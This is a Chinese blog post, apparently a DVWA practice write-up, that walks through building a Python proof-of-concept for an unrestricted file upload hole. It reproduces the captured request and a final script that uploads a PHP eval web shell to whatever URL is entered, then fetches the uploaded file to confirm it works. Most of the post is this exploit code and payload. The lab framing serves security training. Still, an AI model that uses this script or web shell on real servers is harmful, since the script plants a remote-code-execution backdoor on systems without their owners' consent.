python DVWA文件上传POC练习

最新推荐文章于 2024-05-13 15:31:28 发布
最新推荐文章于 2024-05-13 15:31:28 发布
阅读量243 收藏 2
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/132792657
版权

 首先,构造POC我们首先要明白漏洞利用的流程,然后要知道请求包的格式,然后才能针对性的POC

这里先选择低难度的文件上传,低难度的是没有任何过滤可以直接上传的,先上传一个php一句话木马,使用burpsuite抓包

POST /dv/vulnerabilities/upload/ HTTP/1.1

Host: 10.9.75.161

Content-Length: 435

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://10.9.75.161

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuxrXFxFcx9P3yQDY

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/upload/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close



------WebKitFormBoundaryuxrXFxFcx9P3yQDY

Content-Disposition: form-data; name="MAX_FILE_SIZE"



100000

------WebKitFormBoundaryuxrXFxFcx9P3yQDY

Content-Disposition: form-data; name="uploaded"; filename="1.php"

Content-Type: application/x-php



<?php eval($_REQUEST[777]);phpinfo();?>


------WebKitFormBoundaryuxrXFxFcx9P3yQDY

Content-Disposition: form-data; name="Upload"



Upload

------WebKitFormBoundaryuxrXFxFcx9P3yQDY--

 这里我直接复制下来是不能用的

这里需要将内容变成这种格式的请求头,这里可以用笨方法一个一个改,但是这里是可以通过python的正则表达式来提高我们的效率的

"Content-Length":"435",

这里按照下面的步骤,如果要求不同选择其他正则表达式即可

 效果如下

然后在外面套上headers

在头部信息里其实只要UA信息就可以了,cookie和accept可以要也可以不要,可以自己慢慢修改

headers={
"User-Agent":" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
"Accept":" text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Cookie":" security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3",
}

再来看请求头的data部分

------WebKitFormBoundaryuxrXFxFcx9P3yQDY

Content-Disposition: form-data; name="MAX_FILE_SIZE"



100000

------WebKitFormBoundaryuxrXFxFcx9P3yQDY

Content-Disposition: form-data; name="uploaded"; filename="1.php"

Content-Type: application/x-php



<?php eval($_REQUEST[777]);phpinfo();?>


------WebKitFormBoundaryuxrXFxFcx9P3yQDY

Content-Disposition: form-data; name="Upload"



Upload

------WebKitFormBoundaryuxrXFxFcx9P3yQDY--

构造files部分

files={
"MAX_FILE_SIZE":(None,100000),
"uploaded":("1.php","<?php eval($_REQUEST[777]);phpinfo();?>"),
"Upload":(None,"Upload")
}

数据包是POST方式,所以脚本也要POST方式

POST /dv/vulnerabilities/upload/ HTTP/1.1
 res=requests.post(url+path, headers=headers, files=files)
 print(res.text)

中间报了一个错误,再用正则表达式修改一下

下面附上最终POC

import requests

def upload(url):
    path = '/dv/vulnerabilities/upload/'  # 上传入口
    headers={
"Host":" 10.9.75.161".strip(),
"Content-Length":" 435".strip(),
"Cache-Control":" max-age=0".strip(),
"Upgrade-Insecure-Requests":" 1".strip(),
"Origin":" http://10.9.75.161".strip(),
"Content-Type":" multipart/form-data; boundary=----WebKitFormBoundaryuxrXFxFcx9P3yQDY".strip(),
"User-Agent":" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36".strip(),
"Accept":" text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9".strip(),
"Referer":" http://10.9.75.161/dv/vulnerabilities/upload/".strip(),
"Accept-Encoding":" gzip, deflate".strip(),
"Accept-Language":" en-US,en;q=0.9".strip(),
"Cookie":" security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3".strip(),

    }
    files={
    "MAX_FILE_SIZE":(None,100000),
    "uploaded":("1.php","<?php eval($_REQUEST[777]);phpinfo();?>"),
    "Upload":(None,"Upload")
    }
    res=requests.post(url+path, headers=headers, files=files)
    print(res.text)
    poc_path = "/dv/hackable/uploads/1.php"
    resp=requests.post(url+poc_path)
    if "PHP Version" in resp.text:
        print("[+]",url,"存在文件上传漏洞")
    else:
        print("[-]",url,"未发现存在文件上传漏洞")

if __name__ == '__main__':
    url=input('输入需要检测的url:')
    upload("http://"+url)

运行结果

blackK_YC
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
POC顶层文件
05-26
东南大学POC实验顶层文件verilog编写
使用 Python 编写文件上传漏洞Poc
soldi_er的博客
01-07 5150
文章目录前言调试过程人工上传的请求数据构造请求头构造请求的文件字典调试最新上传脚本 前言 之前写过文件上传相关的利用脚本,但是一直不太明白,也遗憾AWD攻防时没用到自动文件上传木马。审计到一个文件上传漏洞,刚好要编写Poc,所以花点时间写一个小本。 参考: PHP_Session文件上传利用:文件包含 网络爬虫-使用requests上传multipart/form-data格式文件 调试过程 人工上传的请求数据 POST /glfusion-1.7.9/public_html/admin/plugins
POC&EXP编写—文件上传案例
最新发布
剁椒鱼头没剁椒的博客
05-13 535
之前的文章基本上都是一些相对来说都是验证类的或者说是一些代码执行类的,相对来说都不是太复杂,而这篇会涉及到文件上传的案例,很多类似于代码执行这些,在编写的时候主要需要注意的就是执行完后,返回来的结果如何展现出来。phpinfo,可能不单单有漏洞在返回中有这个单词,还有可能正常情况下返回值也有这个单词,那不就出现误报了么?
python poc1---DVWA文件上传[low]
weixin_43152809的博客
02-22 268
python poc1---DVWA文件上传[low]
文件上传漏洞—简单利用(墨者学院靶场)
weixin_44431280的博客
02-24 2039
文件上传漏洞—简单利用(墨者学院靶场) 说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。 信息收集: 访问目标靶场地址,得到如下界面,根据google插件Aappalyzer判断目标靶场信息: Web容器:Apache 脚本语言:PHP 操作系统:Ubuntu(linux) 测试过程: 1,根据功能点判断此处可能存在文件上传漏洞,尝试上传扩展名为txt和php的文件,发现扩展名为txt的文件可以正常上传,但是php后缀的文件上传失败 2,上传文件poc.txt,使用Bur
PHP及DVWA文件
07-28
PHP及DVWA文件包,内有phpstudy_x64_8.1.1.3及DVWA-master,DVWA解压可直接用。 DVWA页面登陆用户为root,密码为123456
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
DVWA(Damn Vulnerable Web Application)DVWA资源文件
08-06
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。...
DVWA练习平台
04-24
是一个用来进行安全脆弱性鉴定的 PHP /MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
python实现暴力破解.py
06-18
使用python简单实现dvwa中的暴力破解,该代码仅用于学习,禁止赖用,不得用于违法活动。
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
文件上传漏洞靶场upload-labs学习(pass16-pass21)
AFCC_的博客(Web_Dog)
03-19 3939
Upload-Labs关卡0x00 Pass16(exif_imagetype函数绕过)环境准备exif_imagetype函数0x01 Pass17(二次渲染绕过)move_uploaded_file函数imagecreatefromjpeg、imagecreatefrompng、imagecreatefromgif函数imagejpeg、imagepng、imagegif函数过关思路GIF文件插入payloadpng、jpg文件插入payload0x02 Pass18(条件竞争绕过)抓取上传数据包抓取访
文件上传漏洞—简单利用2(墨者学院靶场)
weixin_44431280的博客
03-01 906
文件上传漏洞—简单利用(墨者学院靶场) 说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。 上传思路: 步骤一:判断网站支持文件格式。从网站功能点或者题目说明可以判断处,该功能点支持上传图片格式(JPG,GIF和PNG等)文件 尝试上传文件名为poc.jpg和poc.php的图片:判断网站支持JPG格式文件上传 poc.jpg格式上传成功: poc.php格式上传失败: 步骤二:猜测网站拦截方式(前端JS/MIME类型/文件扩展名/黑白名单/文件内容检测/) JS前端,MI
文件上传的多种利用方式
tomyyyyy
03-22 2267
文件上传的多种利用方式 文件上传漏洞除了可以通过绕过检测进行webshell的上传之外,还有多种其它的漏洞可以进行测试。 XSS漏洞 文件名造成的XSS 当上传任何文件时,文件名肯定是会反显示在网页上,可以使用 XSS Payload做文件名尝试将其上传到 Web 应用程序。这样就可能会触发XSS。 抓包修改文件名为如下所示的名字 <img src=x onerror=alert(1)&g...
Pocsuite编写ActiveMQ任意文件上传漏洞脚本
qq_40997679的博客
10-07 405
想了解更多Pocsuite脚本、请关注微信公众号【白猫学安全】
POC——DVWA‘s File Inclusion
weixin_45260839的博客
06-19 135
POC——DVWA's File Inclusion
Apache POC(对Excel文件操作)
weixin_67573348的博客
09-22 602
Apache POI 是一个处理Miscrosoft Office各种文件格式的开源项目,我们可以使用POI在java程序中对Miscrosoft Office各种文件进行读写操作一般情况下,POI都是用于操作Excel文件
Pocsuite3渗透测试框架编写POC和EXP脚本
悦分享
07-07 5667
一、Pocsuite3简介编写poc和exp并不是大佬们才会的,借助于某些框架,小白也可以编写自己的poc和exp,并且实现批量刷SRC。我们这里使用Pocsuite 3 来实现自己编写脚本,Pocsuite是由”知道创宇404实验室”打造的一款开源的远程漏洞测试框架,你可以直接使用它进行漏洞的验证与利用,也可以基于它进行POC/EXP的开发Pocsuite 3用Pyhton3编写,支持verify、attack及shell三种模式,可以通过指定单个目标或者从文件中导入多个目标,使用单个POC或者POC集合
dvwa文件上传漏洞
05-11
DVWA(Damn Vulnerable Web Application)是一个专门为测试人员和安全研究人员设计的漏洞练习平台。文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值